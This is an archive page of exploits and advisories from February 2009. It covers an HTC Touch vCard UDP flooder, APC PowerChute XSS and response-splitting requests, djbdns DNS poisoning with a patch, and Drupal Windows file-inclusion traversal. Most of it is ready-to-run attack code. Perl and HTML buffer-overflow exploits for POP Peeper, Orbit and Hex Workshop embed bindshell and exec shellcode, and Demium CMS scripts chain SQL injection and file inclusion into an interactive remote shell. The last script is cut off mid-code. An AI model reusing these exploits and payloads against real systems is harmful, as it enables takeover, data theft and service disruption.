Exploits and Vulnerabilities container: February 2009

HTC Touch vCard over IP Denial of Service PoC

The code provide means for demonstrating the HTC Touch vCard over IP DoS by sending vCards to port UDP/9204 of the target IP address.

The number of vCards (-c), the time interval between each vCard (-d), the length -l) and, of course, the target address are configurable.

The content of each message can also be selected (-t) by providing the desired content, that will be embedded in each vCard sent.

Finally, a dedicated option (-s), can be used for demonstrating the effect of very large vCards. According to the advisory, these vCards are silently received without triggering any sound or ringtone, even if they have been properly selected on the UI settings.

#! /usr/bin/env python
#
# Copyright (c) 2009 Mobile Security Lab www.mseclab.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#

from socket import *
from sys import exit,argv
from time import *
import random
from optparse import OptionParser

# Global Variables
PORT = 9204
DEF_NUM_PACKETS = 10
DEF_VCARD_LEN = 1410
DEF_DELAY = 0.7
VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:"
VCARD_TRAILER = "\r\nEND:VCARD\r\n"

def main():
# Local variables
num_packets = DEF_NUM_PACKETS
delay = DEF_DELAY

print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n"
# Parsing options
parser = OptionParser("usage: %prog [options] target_IP")
parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)")
parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count")
parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay")
parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len")
parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text")

# Parse input
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
print ""
exit(1)

if options.count:
num_packets = options.count

if options.delay:
delay = options.delay

if options.silence:
vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER
elif options.len:
vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER
elif options.text:
vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER
else:
vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER

# Socket creation
udp_sock = socket(AF_INET, SOCK_DGRAM)
ADDR = (args[0],PORT)

# Start sending packet
counter = 1
c_lap = 0
total_data = 0
print "Sending %d packets... to %s" % (num_packets,ADDR)
start_time = time()
start_lap = time()

# Start sending packet
while counter <= num_packets:
len_sent = udp_sock.sendto(vcard_body,ADDR)
if len_sent != len(vcard_body):
print "Error sending packet n.%d" %counter
break

# Update Counter
counter += 1
c_lap += 1
total_data += len_sent

# Sleep for letting the device parse vcards
sleep(delay)

# Check number of packets in a second
local_lap = time()
if local_lap - start_lap >= 1:
print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap))
start_lap = local_lap
c_lap = 0

stop_time = time()
stop_sec = stop_time - start_time

# Display info
print "Sent %d packets in %f seconds" % (num_packets, stop_sec)
print "Start time: %s" %ctime(start_time)
print "Stop time: %s" %ctime(stop_time)
print "Payload Len = %d bytes" % len(vcard_body)
print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024)))

#Global start
if __name__ == "__main__":
main()

APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

Application: APC PowerChute Network Shutdown's Web Interface
Vendor URL: http://www.apc.com/
Bug: XSS/Response Splitting
Exploits: YES
Reported: 20.10.2008
Vendor Response: 20.10.2008
Vendor Reference: 081020-000796
Solution: Use Firewall
Date of Public Advisory: 26.02.2009
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Linked XSS and Response Splitting vulnerabilities found in APC PowerChute Network Shutdown's Web Interface.

Details
*******

1. Linked XSS Vulnerability found in script /security/applet vulnerable parameter - "referrer"

Example
*******

GET /security/applet?referrer=>"'>

2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page"

Example
*******

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html

Solution
********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that user's continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall.

References
**********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539

About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

research [at] dsecrg [dot] com

Djbdns misformats some long response packets; patch and example attack

The DNS packet format allows names to be compressed by replacing the suffix of a name with an encoded offset to another location in the packet where the suffix already exists. Because of the encoding scheme, valid offsets are limited to < 16384.

In djbdns 1.05, response.c handles name compression. Line 12 has a comment "each <>= 16384 bytes into the packet, response_addname() incorrectly tries to encode an offset to that name and produces a misformatted response packet. (At the bottom of this email, there is a patch for this.)

You can reproduce an exploit of this bug as follows:

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# burlap.dempsky.org from shinobi.dempsky.org.
$ ./ucspi-tcp-0.88/tcpclient shinobi.dempsky.org 53 \
./djbdns-1.05/axfr-get burlap.dempsky.org data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.x.burlap.dempsky.org using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.x.burlap.dempsky.org

The last command will include these two lines in the output:

additional: foo 8388608 NS a.ns.bar
additional: foo 8388608 NS b.ns.bar

i.e., poisonous NS records for foo, delegating the domain to a.ns.bar and b.ns.bar; with my patch applied, only records within burlap.dempsky.org are output. Also, there's significant freedom in what poisonous records the attacker can produce.

The security hole here is that an administrator that uses djbdns 1.05 to serve DNS content does not expect that configuring his name server as above will cause it to send records for names outside of burlap.dempsky.org. I.e., an attacker can trick the administrator's name servers to include arbitrary DNS records in response to queries for names within domains he controls. Note that axfr-get is doing the right thing here: it already strips out names from outside of thespecified zone; it's just that tinydns-get (and so tinydns and axfrdns) misformat the response packet. A direct NS query for foo would not generate these poisonous records.

As a real life example, I registered burlap.dempsky.org as a secondary domain with EveryDNS pulling data from my server. I was able to trick their name servers into serving the above poisonous NS records. EveryDNS's name servers have no authority over the hypothetical foo TLD, but I could have included poisonous NS records for everydns.net instead. The DNS cache from djbdns 1.05, dnscache, would have rejected these records as poison, but it's possible other DNS caches might accept them. (Either way, EveryDNS installed my patch earlier today, so this is no longer a risk.)

As another example, I registered burlap.afraid.org as a secondary domain with FreeDNS (freedns.afraid.org). They don't use djbdns, but if they had, this would have allowed me to include poisonous NS records for afraid.org that DNS caches like dnscache and BIND would have accepted.

Some caveats: this bug only affects domains that serve DNS content using tinydns and axfrdns (only for DNS queries over TCP; clients do not need AXFR permissions) from djbdns 1.05 and allow untrusted users to include arbitrary records (at least about 100 records, totalling about 30KB of space) within some zone.

In summary: if you use tinydns/axfrdns from djbdns 1.05 to serve authoritative DNS content and give untrusted users control over records you serve, I strongly suggest you install this patch. I don't believe other users are at risk, but they are encouraged to install this patch as well to be safe.

Finally, here's the promised patch:

--- response.c.orig 2009-02-24 21:04:06.000000000 -0800
+++ response.c 2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
uint16_pack_big(buf,49152 + name_ptr[i]);
return response_addbytes(buf,2);
}
- if (dlen <= 128)
+ if ((dlen <= 128) && (response_len < 16384))
if (name_num < NAMES) {
byte_copy(name[name_num],dlen,d);
name_ptr[name_num] = response_len;

#matthewatdempsky(dot)org

Drupal Local File Inclusion Vulnerability (Windows)

Vulnerable code:
function theme_render_template($template_file, $variables) {
extract($variables, EXTR_SKIP); // Extract the variables to a local
namespace
ob_start(); // Start output buffering
include "./$template_file"; // Include the template file <<< here
is the vulnerability
$contents = ob_get_contents(); // Get the contents of the buffer
ob_end_clean(); // End buffering and discard
return $contents; // Return the contents
}

Basically, by manipulating the q variable, it's possible to partially control the include path. The GET variable q was set to "start/../../xxx\..\..\end" and it got partially sanitized. It reached the include function as "./themes/garland/page-start-..-..-xxx\..\..\end.tpl.php". All the slashes were replaced with "-".

Even more, we cannot fully control the include path, the user input is automatically prefixed with "./themes/garland/page-".

So, this vulnerability doesn't look exploitable, right? Actually, this is exploitable, but only on Windows systems.

On Unix systems, something like "cat /var/www/some_invalid_filename/../../../../../etc/passwd" doesn't work because some_invalid_filename is not a directory. It will not work even if you have a valid filename in there. In my opinion this is the expected behavior.

However, on Windows things are differently.

Executing the command "type c:\windows\sssssssssssss\..\..\..\..\..\boot.ini" will return the contents of c:\boot.ini even if sssssssssssss is not a directory and it doesn't even exists as a filename.

PHP option magic_quotes_gpc is turned OFF in Drupal, so it's possible to use to terminate the string. Therefore, if you set q to something like q=\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini it's possible to include the contents of boot.ini on Windows systems (if the web server is installed on the C: partition).

A bit more information is available in our blog at http://www.acunetix.com/blog/websecuritynews/drupal-local-file-inclusion-vulnerability/.

Drupal security team was notified about this vulnerability on 29 January 2009 and they've released a fix on 25 February 2009.

The fix for Drupal versions 5.x is available at http://drupal.org/node/384024.
And for Drupal versions 6.x can be found at http://drupal.org/node/383724.

POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)

#!/usr/bin/perl
# KL0209EXP-poppeeper_uidl-bof.pl
# 02.27.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (gotta love no /SafeSEH). Special thanks goes to James Burton for help
# and collaboration for exploitation of this bug :P. Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
# Jayji (James Burton) [jayjiftw@gmail.com]
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.jpg
#
# KL0209EXP-poppeeper_uidl-bof.pl

use IO::Socket;

$nextsehh = 0x909006EB; # JMP 6
$sehh = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret

# Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread)
$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" .
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x47" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" .
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x38" .
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" .
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x4a\x42\x45\x57\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58" .
"\x49\x38\x4e\x56\x46\x52\x4e\x51\x41\x36\x43\x4c\x41\x43\x4b\x4d" .
"\x46\x36\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x44\x4e\x30\x4b\x58" .
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x55\x4a\x46" .
"\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x47\x43\x37" .
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e" .
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x55\x43\x35\x43\x35\x43\x34" .
"\x43\x55\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x49\x4d" .
"\x43\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x49\x4a\x46\x46\x4a" .
"\x4c\x31\x42\x47\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" .
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x55" .
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x36" .
"\x4d\x36\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x32\x4e\x4c" .
"\x49\x48\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x54\x4e\x32" .
"\x43\x39\x4d\x48\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" .
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" .
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x36" .
"\x41\x50\x41\x55\x41\x35\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x55\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>'110',
Listen=>1,
Timeout=>60)
or die "Error: listen(110)\n";

$cli = $serv->accept() or die "Error: accept()\n";

$nextseh = pack('l', $nextsehh);
$seh = pack('l', $sehh);
$nop = "\x90";

$payload = "+OK\r\n1 " . "A" x 1072 . $nextseh . $seh . $nop x 32 . $sc . "\r\n.\r\n";

$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 1 100\r\n");
$cli->recv($recvbuf, 512);
$cli->send($payload);

close($cli);
close($serv);

# milw0rm

Orbit <= 2.4 Long Hostname Remote Buffer Overflow Exploit

html
body

Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc

Vulnerability discovered by Secunia

Exploit and POC provided by: JavaGuru

Right click on link below then choose download by orbit, CALC.EXE will pop up.

I got a lot of problems when trying to execute shellcode, because a lot of chars was forbidden and I was not able to execute shellcode. After playing a little I found out the solution. Don't forget, open this HTML in Firefox.

Check it out.

Any questions/comments: JavaGuru1999@yahoo.de

script language="JavaScript"
var tmp = "http://";

for (i=0;i<508;i++) tmp +="%6F";

// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "%7B%46%86%7C";

// some nops
tmp += "%90%90%90%90";

// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp += "%eb%59%59%59%59%eb%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%e8%a4%ff%ff%ff%37%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%67%58%50%30%42%31%41%42%6b%42%41%77%32%42%42%32%41%41%30%41%41%58%42%50%38%42%42%75%6d%39%49%6c%4b%58%37%34%43%30%33%30%77%70%6e%6b%73%75%55%6c%6e%6b%61%6c%66%65%50%78%54%41%4a%4f%6c%4b%62%6f%56%78%4c%4b%51%4f%45%70%55%51%7a%4b%31%59%6e%6b%36%54%4c%4b%53%31%6a%4e%45%61%4f%30%5a%39%4c%6c%6e%64%49%50%34%34%55%57%6a%61%4b%7a%66%6d%35%51%6b%72%6a%4b%6c%34%55%6b%41%44%44%64%76%64%73%45%5a%45%4c%4b%73%6f%57%54%47%71%6a%4b%30%66%6c%4b%74%4c%30%4b%6c%4b%53%6f%37%6c%47%71%5a%4b%6e%6b%77%6c%6c%4b%34%41%4a%4b%4b%39%51%4c%44%64%54%44%7a%63%37%41%4f%30%41%74%6c%4b%43%70%76%50%4c%45%4f%30%30%78%66%6c%6c%4b%37%30%64%4c%6c%4b%30%70%65%4c%6c%6d%4c%4b%43%58%36%68%78%6b%75%59%6e%6b%6f%70%4e%50%55%50%55%50%55%50%4e%6b%75%38%55%6c%43%6f%46%51%79%66%63%50%70%56%4c%49%6c%38%6b%33%6f%30%61%6b%32%70%71%78%61%6e%6b%68%7a%42%43%43%71%78%5a%38%6b%4e%6d%5a%76%6e%70%57%69%6f%6d%37%72%43%55%31%30%6c%70%63%76%4e%70%65%72%58%50%65%73%30%67";

// Filename (not important)
tmp += "/a.rar";

// Write link for download for orbit!
document.write ('a href="' + tmp + '">Right click, then choose download with orbit');

script
body
html

# milw0rm

Hex Workshop v6 (.HEX File) Local Code Execution Exploit

#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovred by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information vist my blog:http://datasniper.arab4services.net/
# the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.

print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";

# milw0rm

Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit

Demium CMS, version 0.2.1 Beta, is prone to multiple remote vulnerabilities, because of insufficient security on it. Let's see them. In this advisory you can find vulnerabilities, afflicted source, and multiple Remote Exploit.

Credits to : Giovanni Buzzin, Osirys
Contact : osirys[at]autistici[dot]org
Website : http://osirys.org
Download : http://www.demium.de/ftp/archive/demium_beta_v.0.2.1.rar

[0x01 - Authority Bypass via Sql Injection]

At first, it's vulnerable to Authority Bypass via Sql Injection. Needs Magic Quotes OFF to work, because CMS dosn't stripslash on POST data.

Vulnerable file is: /[path]/index_admin.php
[CODE]
$username = $_POST['user'];
$pw = md5($_POST['pw']);
$sql = "SELECT * FROM cms_profile WHERE profile_username = '$username' AND profile_password = '$pw' AND profile_aktiv=1;";
$result = mysql_query($sql);
$failure=true;
while($row = mysql_fetch_assoc($result))
{
$failure=false;
setcookie("login_pw", $pw, (time()+(60*60*24*365)));
setcookie("login_user", $username, (time()+(60*60*24*365)));
header("Location: /demium_beta_v.0.2.1//index_admin.php?loading=1");
}
}
[/CODE]

To exploit this vulnerability, and become Administrator, just put this in username form: admin_user' or '1=1
Where admin_user is the real nickname of the Administrator, by default: admin.

[/0x01]

[0x02 - Remote SQL Injection]

Multiple SQL Injection vulnerabilities found on this CMS. I just report the first one that I found. Needs Magic Quotes needs to be OFF because this CMS doesn't stripslash on GET incoming data.

Vulnerable file is: /[path]/tracking.php
[CODE]

' into outfile '/tmp/sh_spawn_ownz.txt

Exploit #1 will produce a GET request to a non existing file, since after the exploit the remote user will be redirected to host/sql_output/.html
Testing this SQL Injection in local I got redirected to this URL: http://localhost/admin:5f4dcc3b5aa765d61d8327deb882cf99/.html , producing the classic:
The requested URL /admin:5f4dcc3b5aa765d61d8327deb882cf99/.html was not found on this server.

Exploit #2 just create a file called "sh_spawn_ownz.txt" with "" as content, yes, a Remote Shell. With LFI vulnerability the remote user will be able to include the created file and executes command.

Exploit provided at the end of the adviosory.

[/0x02]

[0x03 - Remote File Disclosure]

It's also vulnerable to File Disclore, with a GET request a remote user is able to read files content. It's not a file inclusion, but a fread of a local file. Let's see the vulnerable code.

Vulnerable file is: /[path]/urheber.php
[CODE]
", $contents);
echo $contents;
}
// Other code
[/CODE]

$fname comes directly from GET, without been cheeked before. From get we can se it's value, and adding a NULL BYTE a remote user will be able to read the content of the selected file.

Attach example: /[path]/urheber.php?name=../content.php
This request will show /[path]/content.php source code.
Attach example #2 : /[path]/urheber.php?name=../../../../../../../../../../etc/passwd

[/0x03]

[0x04 - Local File Inclusion]

This CMS, it's also affected to Local File Inclusion, a remote user will able to include and execute local file on the server. I coded then a simple exploit to obtain a Remote Command Execution, creating a malicious file on the server, to include it then with the LFI.

Vulnerable file is: /[path]/content.php
[CODE]

[/CODE]

In case of remote user's user and password cookies, the script will include GET data, simple Perl sploit at the end of the advisory.

[/0x04]

#########
Exploits section now.
####

[$$ - Local File Inclusion Exploit]

#!/usr/bin/perl

# LFI Sploit
# by Osirys

use IO::Socket;

my $host = $ARGV[0];

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

&exploit;

sub exploit () {
print "\n[*] Include: ";
chomp($l_file = );

print "\n";
$l_file !~ /exit/ || die "Exiting ..";
if ($l_file !~ /^/) {
$l_file = $l_file."";
}

my $url = $path."/content.php?include=".$l_file;

my $data = "GET ".$url." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
"Content-Length: 0\r\n\r\n".
"\r\n";

my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

$socket->send($data);

my $count = 0;
while (my $e = <$socket>) {
$count++;
if ($count > 9) {
chomp($e);
print "$e\n";
}
}

&exploit;
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.+)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.+)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}

sub banner {
print "\n".
" --------------------------- \n".
" Demium CMS LFI sploit \n".
" by Osirys \n".
" --------------------------- \n\n";
}

sub help () {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Bad hostname! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

[/$$]

[$$$ - Remote Command Execution Exploit via SQL Injection and Local File Inclusion (Works with mq Off)]

#!/usr/bin/perl

# RCE Exploit
# Step 1 => Creating a remote Shell in /tmp via SQL Injection
# Step 2 => Including via LFI remote Shell, executing your CMDs

# by Giovanni Buzzin, Osirys

# ----------------------------------------------------------------------------
# Exploit in action [>!]
# ----------------------------------------------------------------------------
# osirys[~]>$ perl sp1.txt http://localhost/demium_beta_v.0.2.1/

# ---------------------------
# Demium CMS RCE sploit
# (SQL-LFI)
# by Osirys
# ---------------------------

# [*] Getting admin login details ..
# [$] User: admin
# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99

# [*] Creating remote Shell via SQL Injection ..
# [*] Spawning remote Shell via LFI ..

# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pwd
# /home/osirys/web/demium_beta_v.0.2.1
# shell[localhost]$> exit
# [-] Quitting ..

# osirys[~]>$
# ----------------------------------------------------------------------------

use IO::Socket;
use LWP::UserAgent;

my $host = $ARGV[0];
my $rand = int(rand 50);

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

print "[*] Getting admin login details ..\n";

my $url = $host."/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*";
my $re = get_req($url);
if ($re =~ /replace\('\/(.+):(.+)\/.html/) {
$user = $1;
$pass = $2;
print "[\$] User: $user\n";
print "[\$] Pass: $pass\n";
}
else {
print "[-] Can't extract admin details\n\n";
}

print "\n[*] Creating remote Shell via SQL Injection ..\n";

my $code = "";
my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt";
my $attack = $host."/tracking.php?follow_kat=osirys' union select '".$code."' into outfile '".$file;
get_req($attack);

print "[*] Spawning remote Shell via LFI ..\n\n";
&exploit;

sub exploit {
my $file = "../../../../../../../../..".$file;
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
chomp($cmd = );
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";

my $url = $path."/content.php?include=".$file."&cmd=".$cmd;

